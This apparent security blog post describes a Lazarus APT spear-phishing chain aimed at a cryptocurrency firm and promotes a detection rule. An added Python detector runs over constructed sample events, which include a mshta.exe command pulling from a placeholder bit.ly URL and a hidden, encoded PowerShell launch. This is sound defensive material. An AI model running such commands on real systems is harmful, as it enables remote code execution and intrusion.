The Lazarus APT group is one of the few state-sponsored cyber espionage units that also carries out financially motivated cybercrime, and it is the most profitable threat actor in the cryptocurrency scene, having stolen about $2 billion. In 2017 alone, the group stole more than half a billion dollars in cryptocurrency, so its interest in traders and exchanges is not weakening, and it recently launched another attack on a cryptocurrency organization.
This time, Lazarus APT took advantage of an already proven trick and carried out a spear-phishing campaign with a fake LinkedIn job advert aimed at a system administrator in the targeted cryptocurrency organization. The victim received a malicious document whose macro creates a .LNK file that calls out to a bit.ly link by executing mshta.exe. The script then sends operational information to a C&C server and receives a PowerShell script that fetches the payloads Lazarus APT used in this campaign.
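As an added example (not part of the original post or of the SOC Prime rule itself), the Python below runs a defender's version of this detection chain over a few constructed Sysmon-style events: an Office process writing a .lnk file, mshta.exe launched by Office with a bit.ly URL on its command line, and PowerShell spawned by mshta.exe. The field names follow Sysmon's, the paths and the bit.ly path are placeholders, and the sets of Office and shortener names are assumptions.

```python
import re

# Constructed Sysmon-style events (ID 1 = process creation, ID 11 = file create),
# flattened to dicts. Paths and the bit.ly path are placeholders, not real IoCs.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"EventID": 11, "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\update.lnk"},
    {"EventID": 1, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://bit.ly/PLACEHOLDER"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc QUJD"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}  # assumed set
URL_SHORTENERS = {"bit.ly"}  # the shortener named in the campaign; extend as needed
URL_RE = re.compile(r"https?://([^/\s]+)", re.IGNORECASE)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()  # lower-cased file name of a Windows path

def classify(event):
    """Return the list of detection labels that fire for one event."""
    alerts = []
    image = basename(event["Image"])
    if event["EventID"] == 11:
        # Office process dropping a .lnk shortcut (the macro stage described above)
        if image in OFFICE_APPS and event["TargetFilename"].lower().endswith(".lnk"):
            alerts.append("office_writes_lnk")
        return alerts
    parent, cmd = basename(event["ParentImage"]), event["CommandLine"]
    if image == "mshta.exe":
        m = URL_RE.search(cmd)
        if m:  # mshta pulling its script from a remote URL instead of a local .hta
            alerts.append("mshta_remote_url")
            host = m.group(1).lower()
            if any(host == s or host.endswith("." + s) for s in URL_SHORTENERS):
                alerts.append("mshta_url_shortener")
        if parent in OFFICE_APPS:
            alerts.append("mshta_spawned_by_office")
    if image == "powershell.exe" and parent == "mshta.exe":
        alerts.append("powershell_spawned_by_mshta")  # second-stage fetch
    return alerts

def scan(events):
    """Map event index -> alert labels for every event that triggers a detection."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}
```

Run over the sample, the benign notepad event produces nothing while the three stages of the chain each raise their own label; in production the same labels would be joined by ProcessGuid so the chain is scored as a whole rather than as three isolated hits.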
Emir Erdogan developed an exclusive rule that detects the TTPs leveraged by Lazarus Group during this attack: https://tdm.socprime.com/tdm/info/tjZGrUO4B5k0/fFr1KXQBPeJ4_8xcVrLz/?p=1
The rule has translations for the following platforms:
SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, RSA NetWitness, LogPoint, Humio
EDR: Carbon Black, Elastic Endpoint
Tactics: Execution, Defense Evasion
Techniques: Command-Line Interface (T1059), Indicator Removal on Host (T1070), Modify Registry (T1112)